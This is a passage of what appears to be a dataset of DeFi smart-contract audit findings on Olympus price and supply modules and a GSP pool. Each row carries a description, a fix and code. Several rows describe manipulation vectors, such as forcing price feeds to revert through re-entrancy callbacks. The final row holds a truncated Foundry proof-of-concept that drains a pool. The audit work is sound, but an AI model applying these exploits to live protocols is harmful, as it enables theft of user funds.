\\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n\\nYou can see that the deviation check includes uncollected fees in the `reservesTokenRatio`, potentially leading to a higher or more volatile ratio compared to the historical `twapTokenRatio`.\\nFinal Price Calculation in `BunniPrice.sol#_getTotalValue()` :\\n```\\n function _getTotalValue(\\n BunniToken token_,\\n BunniLens lens_,\\n uint8 outputDecimals_\\n ) internal view returns (uint256) {\\n (address token0, uint256 reserve0, address token1, uint256 reserve1) = _getBunniReserves(\\n token_,\\n lens_,\\n outputDecimals_\\n );\\n uint256 outputScale = 10 ** outputDecimals_;\\n\\n // Determine the value of each reserve token in USD\\n uint256 totalValue;\\n totalValue += _PRICE().getPrice(token0).mulDiv(reserve0, outputScale);\\n totalValue += _PRICE().getPrice(token1).mulDiv(reserve1, outputScale);\\n\\n return totalValue;\\n }\\n```\\n\\nYou can see that this function (_getTotalValue()) excludes uncollected fees in the final valuation, potentially overestimating the total value within deviation check process, meaning the check could pass in certain conditions whereas it could have not pass if fees where not accounted on the deviation check. Moreover the below formula used :\\n$$ price_{LP} = {reserve_0 \\times price_0 + reserve_1 \\times price_1} $$\\nwhere $reserve_i$ is token $i$ reserve amount, $price_i$ is the price of token $i$\\nIn short, it is calculated by getting all underlying balances, multiplying those by their market prices\\nHowever, this approach of directly computing the price of LP tokens via spot reserves is well-known to be vulnerable to manipulation, even if TWAP Deviation is checked, the above summary proved that this method is not 100% bullet proof as there are discrepancy on what is mesured. Taken into the fact that the process to check deviation is not that good plus the fact that methodology used to compute price is bad, the impact of this is high\\nThe same can be found in BunnySupply.sol `getProtocolOwnedLiquidityReserves()` :\\n```\\n function getProtocolOwnedLiquidityReserves()\\n external\\n view\\n override\\n returns (SPPLYv1.Reserves[] memory)\\n {\\n // Iterate through tokens and total up the reserves of each pool\\n uint256 len = bunniTokens.length;\\n SPPLYv1.Reserves[] memory reserves = new SPPLYv1.Reserves[](len);\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniToken token = tokenData.token;\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(token);\\n (\\n address token0,\\n address token1,\\n uint256 reserve0,\\n uint256 reserve1\\n ) = _getReservesWithFees(key, lens);\\n\\n // Validate reserves\\n _validateReserves(\\n key,\\n lens,\\n tokenData.twapMaxDeviationBps,\\n tokenData.twapObservationWindow\\n );\\n\\n address[] memory underlyingTokens = new address[](2);\\n underlyingTokens[0] = token0;\\n underlyingTokens[1] = token1;\\n uint256[] memory underlyingReserves = new uint256[](2);\\n underlyingReserves[0] = reserve0;\\n underlyingReserves[1] = reserve1;\\n\\n reserves[i] = SPPLYv1.Reserves({\\n source: address(token),\\n tokens: underlyingTokens,\\n balances: underlyingReserves\\n });\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n return reserves;\\n }\\n```\\n\\nWhere returned value does not account for uncollected fees whereas deviation check was accounting for it",Align the methodology used in both the deviation check and the final price computation. This could involve either including the uncollected fees in both calculations or excluding them in both.\\nIt's ok for BunniSupply as there are 2 functions handling both reserves and reserves+fees but change deviation check process on the second one to include only reserves when checking deviation twap ratio,"`_getTotalValue()` from BunniPrice.sol and `getProtocolOwnedLiquidityReserves()` from BunniSupply.sol have both ratio computation that includes uncollected fees to compare with TWAP ratio, potentially overestimating the total value compared to what these functions are aim to, which is returning only the reserves or LP Prices by only taking into account the reserves of the pool. Meaning the check could pass in certain conditions where fees are included in the ratio computation and the deviation check process whereas the deviation check should not have pass without the fees accounted.","```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n" +Price can be miscalculated.,medium,"In `SimplePriceFeedStrategy.sol#getMedianPrice` function, when the length of `nonZeroPrices` is 2 and they are deviated it returns first non-zero value, not median value.\\n`SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` is as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n\\nAs you can see above, on L237 it gets the list of non-zero prices. If the length of this list is smaller than 3, it assumes that a median price cannot be calculated and returns first non-zero price. This is wrong. If the number of non-zero prices is 2 and they are deviated, it has to return median value. The `_getMedianPrice` function called on L253 is as follows.\\n```\\n function _getMedianPrice(uint256[] memory prices_) internal pure returns (uint256) {\\n uint256 pricesLen = prices_.length;\\n\\n // If there are an even number of prices, return the average of the two middle prices\\n if (pricesLen % 2 == 0) {\\n uint256 middlePrice1 = prices_[pricesLen / 2 - 1];\\n uint256 middlePrice2 = prices_[pricesLen / 2];\\n return (middlePrice1 + middlePrice2) / 2;\\n }\\n\\n // Otherwise return the median price\\n // Don't need to subtract 1 from pricesLen to get midpoint index\\n // since integer division will round down\\n return prices_[pricesLen / 2];\\n }\\n```\\n\\nAs you can see, the median value can be calculated from two values. This problem exists at `getMedianPrice` function as well.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\n","First, `SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` function has to be rewritten as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n- if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n+ if (nonZeroPrices.length < 2) return firstNonZeroPrice;\\n\\n // rest of code\\n }\\n```\\n\\nSecond, `SimplePriceFeedStrategy.sol#getMedianPrice` has to be modified as following.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n- if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n+ if (nonZeroPricesLen < 2) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\n","When the length of `nonZeroPrices` is 2 and they are deviated, it returns first non-zero value, not median value. It causes wrong calculation error.","```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n" +Price calculation can be manipulated by intentionally reverting some of price feeds.,medium,"Price calculation module iterates through available price feeds for the requested asset, gather prices of non-revert price feeds and then apply strategy on available prices to calculate final asset price. By abusing this functionality, an attacker can let some price feeds revert to get advantage from any manipulated price feed.\\nHere we have some methods that attackers can abuse to intentionally revert price feeds.\\nUniswapV3 price feed UniswapV3Price.sol#L210-214\\n```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n\\nIn UniswapV3 price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it from UniswapV3's callback methods.\\nBalancer price feed BalancerPoolTokenPrice.sol#L388 BalancerPoolTokenPrice.sol#487 BalancerPoolTokenPrice.sol#599 BalancerPoolTokenPrice.sol#748\\n```\\n// Prevent re-entrancy attacks\\nVaultReentrancyLib.ensureNotInVaultContext(balVault);\\n```\\n\\nIn BalancerPool price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it in the middle of Balancer action.\\nBunniToken price feed BunniPirce.sol#L155-160\\n```\\n_validateReserves(\\n _getBunniKey(token),\\n lens,\\n params.twapMaxDeviationsBps,\\n params.twapObservationWindow\\n);\\n```\\n\\nIn BunniToken price feed, it validates reserves and reverts if it doesn't satisfy deviation. Since BunniToken uses UniswapV3, this can be intentionally reverted by calling it from UniswapV3's mint callback.\\n\\nUsually for ERC20 token prices, above 3 price feeds are commonly used combined with Chainlink price feed, and optionally with `averageMovingPrice`. There are another two points to consider here:\\nWhen average moving price is used, it is appended at the end of the price array. OlympusPrice.v2.sol#L160\\n```\\nif (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n```\\n\\nIn price calculation strategy, first non-zero price is used when there are 2 valid prices: `getMedianPriceIfDeviation` - SimplePriceFeedStrategy.sol#L246 `getMedianPrice` - SimplePriceFeedStrategy.sol#L313 For `getAveragePrice` and `getAveragePriceIfDeviation`, it uses average price if it deviates.\\n\\nBased on the information above, here are potential attack vectors that attackers would try:\\nWhen Chainlink price feed is manipulated, an attacker can disable all three above price feeds intentionally to get advantage of the price manipulation.\\nWhen Chainlink price feed is not used for an asset, an attacker can manipulate one of above 3 spot price feeds and disable other ones.\\nWhen `averageMovingPrice` is used and average price strategy is applied, the manipulation effect becomes half: $\\frac{(P + \\Delta X) + (P)}{2} = P + \\frac{\\Delta X}{2}, P=Market Price, \\Delta X=Manipulated Amount$","For the cases above that price feeds being intentionally reverted, the price calculation itself also should revert without just ignoring it.","Attackers can disable some of price feeds as they want with ease, they can get advantage of one manipulated price feed.","```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n" +getReservesByCategory() when useSubmodules =true and submoduleReservesSelector=bytes4(0) will revert,medium,"in `getReservesByCategory()` Lack of check `data.submoduleReservesSelector!=""""` when call `submodule.staticcall(abi.encodeWithSelector(data.submoduleReservesSelector));` will revert\\nwhen `_addCategory()` if `useSubmodules==true`, `submoduleMetricSelector` must not empty and `submoduleReservesSelector` can empty (bytes4(0))\\nlike ""protocol-owned-treasury""\\n```\\n _addCategory(toCategory(""protocol-owned-treasury""), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n\\nbut when call `getReservesByCategory()` , don't check `submoduleReservesSelector!=bytes4(0)` and direct call `submoduleReservesSelector`\\n```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n // If category requires data from submodules, count all submodules and their sources.\\n len = (data.useSubmodules) ? submodules.length : 0;\\n\\n// rest of code\\n\\n for (uint256 i; i < len; ) {\\n address submodule = address(_getSubmoduleIfInstalled(submodules[i]));\\n (bool success, bytes memory returnData) = submodule.staticcall(\\n abi.encodeWithSelector(data.submoduleReservesSelector)\\n );\\n```\\n\\nthis way , when call like `getReservesByCategory(toCategory(""protocol-owned-treasury"")` will revert\\nPOC\\nadd to `SUPPLY.v1.t.sol`\\n```\\n function test_getReservesByCategory_includesSubmodules_treasury() public {\\n _setUpSubmodules();\\n\\n // Add OHM/gOHM in the treasury (which will not be included)\\n ohm.mint(address(treasuryAddress), 100e9);\\n gohm.mint(address(treasuryAddress), 1e18); // 1 gOHM\\n\\n // Categories already defined\\n\\n uint256 expectedBptDai = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_DAI_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n uint256 expectedBptOhm = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_OHM_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n\\n // Check reserves\\n SPPLYv1.Reserves[] memory reserves = moduleSupply.getReservesByCategory(\\n toCategory(""protocol-owned-treasury"")\\n );\\n }\\n```\\n\\n```\\n forge test -vv --match-test test_getReservesByCategory_includesSubmodules_treasury\\n\\nRunning 1 test for src/test/modules/SPPLY/SPPLY.v1.t.sol:SupplyTest\\n[FAIL. Reason: SPPLY_SubmoduleFailed(0xeb502B1d35e975321B21cCE0E8890d20a7Eb289d, 0x0000000000000000000000000000000000000000000000000000000000000000)] test_getReservesByCategory_includesSubmodules_treasury() (gas: 4774197\\n```\\n","```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n\\n\\n CategoryData memory data = categoryData[category_];\\n uint256 categorySubmodSources;\\n // If category requires data from submodules, count all submodules and their sources.\\n// Remove the line below\\n len = (data.useSubmodules) ? submodules.length : 0;\\n// Add the line below\\n len = (data.useSubmodules && data.submoduleReservesSelector!=bytes4(0)) ? submodules.length : 0;\\n```\\n",some category can't get `Reserves`,"```\\n _addCategory(toCategory(""protocol-owned-treasury""), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n" +Balancer LP valuation methodologies use the incorrect supply metric,medium,"In various Balancer LP valuations, totalSupply() is used to determine the total LP supply. However this is not the appropriate method for determining the supply. Instead getActualSupply should be used instead. Depending on the which pool implementation and how much LP is deployed, the valuation can be much too high or too low. Since the RBS pricing is dependent on this metric. It could lead to RBS being deployed at incorrect prices.\\nAuraBalancerSupply.sol#L345-L362\\n```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo value each LP token the contract divides the valuation of the pool by the total supply of LP. This in itself is correct, however the totalSupply method for a variety of Balancer pools doesn't accurately reflect the true LP supply. If we take a look at a few Balancer pools we can quickly see the issue:\\nThis pool shows a max supply of 2,596,148,429,273,858 whereas the actual supply is 6454.48. In this case the LP token would be significantly undervalued. If a sizable portion of the reserves are deployed in an affected pool the backing per OHM would appear to the RBS system to be much lower than it really is. As a result it can cause the RBS to deploy its funding incorrectly, potentially selling/buying at a large loss to the protocol.",Use a try-catch block to always query getActualSupply on each pool to make sure supported pools use the correct metric.,Pool LP can be grossly under/over valued,```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n +Possible incorrect price for tokens in Balancer stable pool due to amplification parameter update,medium,"Incorrect price calculation of tokens in StablePools if amplification factor is being updated\\nThe amplification parameter used to calculate the invariant can be in a state of update. In such a case, the current amplification parameter can differ from the amplificaiton parameter at the time of the last invariant calculation. The current implementaiton of `getTokenPriceFromStablePool` doesn't consider this and always uses the amplification factor obtained by calling `getLastInvariant`\\n```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n\\n```\\n // @audit the amplification parameter can be updated\\n function startAmplificationParameterUpdate(uint256 rawEndValue, uint256 endTime) external authenticate {\\n\\n // @audit for calculating the invariant the current amplification factor is obtained by calling _getAmplificationParameter()\\n function _onSwapGivenIn(\\n SwapRequest memory swapRequest,\\n uint256[] memory balances,\\n uint256 indexIn,\\n uint256 indexOut\\n ) internal virtual override whenNotPaused returns (uint256) {\\n (uint256 currentAmp, ) = _getAmplificationParameter();\\n uint256 amountOut = StableMath._calcOutGivenIn(currentAmp, balances, indexIn, indexOut, swapRequest.amount);\\n return amountOut;\\n }\\n```\\n",Use the latest amplification factor by callling the `getAmplificationParameter` function,"In case the amplification parameter of a pool is being updated by the admin, wrong price will be calculated.","```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n" +Incorrect deviation calculation in isDeviatingWithBpsCheck function,medium,"The current implementation of the `isDeviatingWithBpsCheck` function in the codebase leads to inaccurate deviation calculations, potentially allowing deviations beyond the specified limits.\\nThe function `isDeviatingWithBpsCheck` checks if the deviation between two values exceeds a defined threshold. This function incorrectly calculates the deviation, considering only the deviation from the larger value to the smaller one, instead of the deviation from the mean (or TWAP).\\n```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n\\nThe function then call `_isDeviating` to calculate how much the smaller value is deviated from the bigger value.\\n```\\n function _isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return ((value0_ - value1_) * deviationMax_) / value0_ > deviationBps_;\\n }\\n```\\n\\nThe function `isDeviatingWithBpsCheck` is usually used to check how much the current value is deviated from the TWAP value to make sure that the value is not manipulated. Such as spot price and twap price in UniswapV3.\\n```\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n baseInQuotePrice,\\n baseInQuoteTWAP,\\n params.maxDeviationBps,\\n DEVIATION_BASE\\n )\\n ) {\\n revert UniswapV3_PriceMismatch(address(params.pool), baseInQuoteTWAP, baseInQuotePrice);\\n }\\n```\\n\\nThe issue is isDeviatingWithBpsCheck is not check the deviation of current value to the TWAP but deviation from the bigger value to the smaller value. This leads to an incorrect allowance range for the price, permitting deviations that exceed the acceptable threshold.\\nExample:\\nTWAP price: 1000 Allow deviation: 10%.\\nThe correct deviation calculation will use deviation from the mean. The allow price will be from 900 to 1100 since:\\n|1100 - 1000| / 1000 = 10%\\n|900 - 1000| / 1000 = 10%\\nHowever the current calculation will allow the price from 900 to 1111\\n(1111 - 1000) / 1111 = 10%\\n(1000 - 900) / 1000 = 10%\\nEven though the actual deviation of 1111 to 1000 is |1111 - 1000| / 1000 = 11.11% > 10%","To accurately measure deviation, the isDeviating function should be revised to calculate the deviation based on the mean value: `| spot value - twap value | / twap value`.","This miscalculation allows for greater deviations than intended, increasing the vulnerability to price manipulation and inaccuracies in Oracle price reporting.","```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n" +Pool can be drained if there are no LP_FEES,high,"The pool can be depleted because swaps allow the withdrawal of the entire balance, resulting in a reserve of 0 for a specific asset. When an asset's balance reaches 0, the PMMPricing algorithm incorrectly estimates the calculation of output amounts. Consequently, the entire pool can be exploited using a flash loan by depleting one of the tokens to 0 and then swapping back to the pool whatever is received.\\nFirstly, as indicated in the summary, selling quote/base tokens can lead to draining the opposite token in the pool, potentially resulting in a reserve of 0. Consequently, the swapping mechanism permits someone to entirely deplete the token balance within the pool. In such cases, the calculations within the pool mechanism become inaccurate. Therefore, swapping back to whatever has been initially purchased will result in acquiring more tokens, further exacerbating the depletion of the pool.\\nAllow me to provide a PoC to illustrate this scenario:\\n```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves ""0"".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the ""_amount"" already which will make the quote token reserve ""0""\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log(""Received quote amount by hippo"", receivedQuoteAmount);\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", 